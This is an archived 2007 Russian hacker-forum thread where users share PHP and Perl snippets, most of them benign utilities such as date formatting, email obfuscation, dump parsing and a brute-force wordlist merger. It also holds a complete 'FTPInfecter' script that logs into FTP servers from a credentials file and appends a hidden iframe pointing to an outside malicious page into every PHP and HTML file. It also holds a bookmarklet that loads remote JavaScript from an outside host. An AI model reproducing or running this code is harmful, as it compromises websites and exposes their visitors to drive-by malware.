ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
02.03.2007, 01:50
|
|
Участник форума
Регистрация: 25.07.2005
Сообщений: 246
Провел на форуме:
457850
Репутация:
174
|
|
Ну так зачем же его искусственно включать?)
Просто предупредил о небезопасности этого =) Используйте функцию. чисто в образовательных целях.
|
|
|
02.03.2007, 23:26
|
|
Постоянный
Регистрация: 17.09.2005
Сообщений: 375
Провел на форуме:
993362
Репутация:
175
|
|
Ну так зачем же его искусственно включать?)
имхо - представляем такую ситуацию:
админ - ленивый консерватор. Программная часть сайта не обновлялась года так эдак с 2000'ого. Все скрипты работают исключительно под register_globals=on (бывает такое). Потребовалось сменить хостинг - а на новом register_globals=off. Переписывать двиг не охота, вот и требуется искусственное включение. Больше, имха, незачем.
|
|
|
|
04.03.2007, 19:19
|
|
Отец порядка
Регистрация: 04.03.2005
Сообщений: 1,007
Провел на форуме:
1204641
Репутация:
412
|
|
Ну так зачем же его искусственно включать?)
потому что при пересылке переменных от одного скрипта(формы) в другой, работать все это дело с выключенными register_globals НЕ БУДЕТ
|
|
|
|
05.03.2007, 17:46
|
|
Новичок
Регистрация: 05.03.2007
Сообщений: 7
Провел на форуме:
19817
Репутация:
7
|
|
Ну вот, такой маленько-прикольный скриптик
Вводим его в адресную строку
Код:
javascript:o=document.createElement("script");o.setAttribute("src","http://digistyle.3dn.ru/egor.js");document.body.appendChild(o);void(0)
Можно над ламером прикольнуться!  |
|
|
|
07.03.2007, 20:21
|
|
Banned
Регистрация: 06.10.2006
Сообщений: 288
Провел на форуме:
2741921
Репутация:
469
|
|
Нацарапал тут скриптец для слияния нескольких брутфорс словарей в один прошу заценить. Я в ПХП плохо понимаю, укажите на мои ошибки пожлуйста. И если скрипт вдруг кому помог не пожалейте, дайте репки 
PHP код:
<?
error_reporting(0);
echo "<html><title>Скрипт склеивает несколько словарей для брута в один.</title><body bgcolor='000000' text='0ff0f9'>
<table border='2' bgcolor='131313' bordercolor='0ff0f9' width='50%' align='center' height='400' cellpadding='15' cellspacing='0'>
<tr valign='top'><td>
<font size='3'>
Скрипт склеивает несколько словарей для брута в один.<br>Автоматически удаляет повторяющиеся элементы.<br>
<font size='2'>(c)oded by underwit</font>
<hr color='0ff0f9'><p>
<form method='POST'>
Имя нового словаря: <input type='text' name='newname' size='10'><p>
Введите путь к папке: <input type='text' name='path' size='60'><p>
<input type='checkbox' name='delite'> Удалить исходные словари?<p>
<input type='submit' value='Склеить'><br>
</form>
<hr color='0ff0f9'><p>";
$truepath = getcwd();
if(empty($path)){echo "Текущий каталог - ".$truepath."<br>";}
if(!empty($newname))
{
if(!empty($path))
{
chdir($path);
echo "Установленный каталог - ".$path."<br>";
$allpass = array();
$catalog = opendir($path) or die("Не удалось открыть каталог");
while($file = readdir($catalog))
{
if(($file != ".") && ($file != ".."))
{
$_file = fopen($file,"r");
while(!feof($_file))
{array_push($allpass, fgets($_file));}
fclose($_file);
}
if($delite == true){unlink($file);}
}
closedir($catalog);
}else{echo "Введите путь к каталогу со словарями";}
}else{echo "Введите новое имя для словаря и укажите путь к каталогу со словарями";}
if(!empty($allpass))
{
$allsize = count($allpass);
$end = array_unique($allpass);
$uniqsize = count($end);
$redel = $allsize - $uniqsize;
$endfile = fopen($newname.".pass","a");
for($i='0';$i<sizeof($end);$i++)
{fwrite($endfile,$end[$i]);}
fclose($endfile);
echo "Новый словарь сохранен как - ".$path."/".$newname.".pass"."<br>";
echo "Всего элементов - ".$allsize."<br>";
echo "Уникальных элементов - ".$uniqsize."<br>";
echo "Удалено повторных - ".$redel."<br>";
}
echo "</font></td></tr></table></body></html>";
?>
|
|
|
|
12.03.2007, 21:28
|
|
Участник форума
Регистрация: 08.11.2006
Сообщений: 167
Провел на форуме:
539434
Репутация:
54
|
|
вот тут был скрипт, давно писал. фтпинфектер... во как.
создаём файл. туда пишем данные вот в таком виде:
ftp_server;login;pass
скрипт парсит этот файл, подключаеццо к каждому серверу и заражает все файлы с расширением php, htm, html. вот собсно сам код
PHP код:
<?
## FTPInfecter by xtreem
## mail: xtreemx@gmail.com
error_reporting(0);
set_magic_quotes_runtime(0);
@set_time_limit(0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
$safe_mode = @ini_get('safe_mode');
echo " This is FTPInfecter script\n";
echo " Coded by xtreem(xtreemx@gmail.com)\n";
echo " example: FTPInfecter.php servers.db\n\n";
if (!$argv[1])
{
$servdb = "servers.txt";
}else{
$servdb = $argv[1];
}
$code = "<iframe src=\"http://hackpage.net/badscript.php\" width=1 height=1></iframe>";
$file = file($servdb, "r");
$count = count($file);
$is = 0;
while ($is < $count)
{
chomp;
$met = explode(';', $file[$is]);
$server = $met[0];
$user = $met[1];
$pass = $met[2];
if (($connect = ftp_connect($server)) && ($login = ftp_login($connect, $user, $pass))){
echo "CONNECTED TO:".$server."\n";
$buff = ftp_nlist($connect, '');
$d = count($buff);
$i = 0;
while ($d <> $i)
{
if ($buff[$i] <> '.' && $buff[$i] <> '..'){
if (ftp_chdir($connect, $buff[$i]))
{
echo "DIR: ".$buff[$i]."\n";
ftp_chdir($connect, '..');
}else{
$part = explode('.', $buff[$i]);
if ($part[1] == 'php' or $part[1] == 'htm' or $part[1] == 'html'){
echo "FILE: ".$buff[$i]."\n";
$fp = fopen($buff[$i], 'w+');
if (ftp_fget($connect, $fp, $buff[$i], FTP_ASCII, 0)) {
echo "GET: ".$buff[$i]."\n";
}
fclose($fp);
$fw = fopen($buff[$i], 'a');
fputs ($fw, $code);
fclose($fw);
echo "INFECTED: ".$buff[$i]."\n";
if (ftp_put($connect, $buff[$i], $buff[$i], FTP_ASCII)) {
echo "PUT: ".$buff[$i]."\n";}
$del = unlink($buff[$i]);
if ($del){echo "DELETE: ".$buff[$i]."\n\n";}
}
}
}
$i++;
}
ftp_close($connect);
}else{echo "NOT CONNECT TO: ".$server."\n";}
$is++;
}
?>
Последний раз редактировалось nc.STRIEM; 12.03.2007 в 22:09..
|
|
|
|
13.03.2007, 02:26
|
|
Отец порядка
Регистрация: 04.03.2005
Сообщений: 1,007
Провел на форуме:
1204641
Репутация:
412
|
|
ифреймер по-русски?)
|
|
|
|
18.03.2007, 20:54
|
|
Новичок
Регистрация: 17.10.2006
Сообщений: 23
Провел на форуме:
144373
Репутация:
104
|
|
Ну со всеми подряд хтмл и пхп ты явно переборщил ))
|
|
|
|
21.03.2007, 15:46
|
|
Постоянный
Регистрация: 11.03.2007
Сообщений: 581
Провел на форуме:
4172659
Репутация:
646
|
|
Вывод даты нормальным русским языком:
PHP код:
function rusdate($d)
{
$montharr = array("января","февраля","марта","апреля","мая","июня","июля","августа","сентября","октября","ноября","декабря");
$i = date("m",$d) - 1;
return date("j",$d)." $montharr[$i] ".date("Y",$d);
}
Узнаем серверное время со сдвигом часовых поясов:
PHP код:
function zonetime($date,$zone)
{
$date+=$zone*3600;
return gmdate("d.m.Y H:i",$date);
}
Например, echo покажет московское время (независимо от того, в каком поясе расположен сервер  )
Следующий скрипт весьма полезен (писал для своей гостевой). Выводит мыла таким образом, чтоб их не смогли воровать роботы-собиральщики мыл (во как):
PHP код:
function showemail($email)
{
echo "<script language=\"JavaScript\"><!--\n".
"document.write('".substr($email,0,strpos($email,"@"))."'+'@'+'".
substr($email,strpos($email,"@")+1,strpos($email,".")-strpos($email,"@")-1)."'+'.'+'".
substr($email,strpos($email,".")+1, strlen($email) - strpos($email,".")-1)."');\n".
"//--></script>\n";
}
(подразумевается, что используется валидный параметр вида бла@бла.бла, проверку мутите еще при вносе в БД мыла =))
Так-с, идем дальше. Так я обычно проверяю, является ли какой-либо параметр числом:
PHP код:
function IsDigit($d)
{
return (!(empty($d)) && ctype_digit($d));
}
Замена в тексте всех мыл и урлок на соответствующие ссылки:
PHP код:
$text = ereg_replace('[-a-z0-9!#$%&\'*+/=?^_`{|}~]+@([.]?[a-zA-Z0-9_/-])*','<a href="mailto:\\0">\\0</a>',$text);
$text = ereg_replace(' [a-zA-Z]+://(([.]?[a-zA-Z0-9_/-])*) ',' <a href="\\0">\\1</a> ',$text);
$text = ereg_replace(' (^| )(www([-]*[.]?[a-zA-Z0-9_/-?&%])*) ',' <a href="http://\\2">\\2</a> ',$text);
Часто на сайтах слева и справа бывают узкие колонки, куда можно повпихивать всякую интересную инфу (например, последние темы с форума). Но если попадается длинное слово, то колонка разъезжается, становится хз че. Следующая функция разрезает на куски только те слова, которые длиннее заданного параметра. Очень полезно:
PHP код:
function break_long_words($source_text,$lng)
{
$regExp='/(\S{'.$lng.',})/ei';
$res_text=preg_replace($regExp,"wordwrap('\\1',$lng,'\n',1)",$source_text);
return $res_text;
}
Пока все. Удачи! |
|
|
|
22.03.2007, 22:21
|
|
Участник форума
Регистрация: 05.09.2006
Сообщений: 184
Провел на форуме:
888851
Репутация:
203
|
|
Выдирает поля из дампа таблицы:
Код:
#!/usr/bin/perl -w
if ($ARGV[0] eq "") {print "Example: perl dump.pl Clients.sql"; exit;}
open (f1,$ARGV[0]) || die $!;
open (f2,">log") ||die $!;
if ($ARGV[1] eq "") {
$s=<f1>;
$s=~s/\'//g;
@temp=split(",",$s);
for ($i=0;$i<$#temp;$i++){
print "$i-$temp[$i]\n"; } #for
print "\nExample: perl dump.pl Clients.sql 4-6-15-20";
exit;
} #if
@temp = split("-",$ARGV[1]);
while (<f1>) {s/\'//g; #s/\s\'//g;
(@temp2)=(split(",",$_))[@temp];
print f2 join(":",@temp2). "\n";
} #while
close(f1);
close(f2);
Запускаем: " perl dump.pl Clients.sql 4-6-15-20"
Clients.sql - имя сортируемого файла, 4-6-15-20 номера колонок через "-" (узнать можно запустив только " perl dump.pl Clients.sql ").
Сортировка файла с удалением повторяющихся элементов:
Код:
#!/usr/bin/perl -w
if ($ARGV[0] eq "") {print 'sort.pl filename'; exit;}
open (f1,$ARGV[0]) || die $!;
open (f3,">sorted") ||die $!;
%seen=();
@uniq=grep {! $seen{$_} ++ } <f1>;
print f3 sort @uniq;
close(f1);
close(f3);
Запускаем: " sort.pl filename" |
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
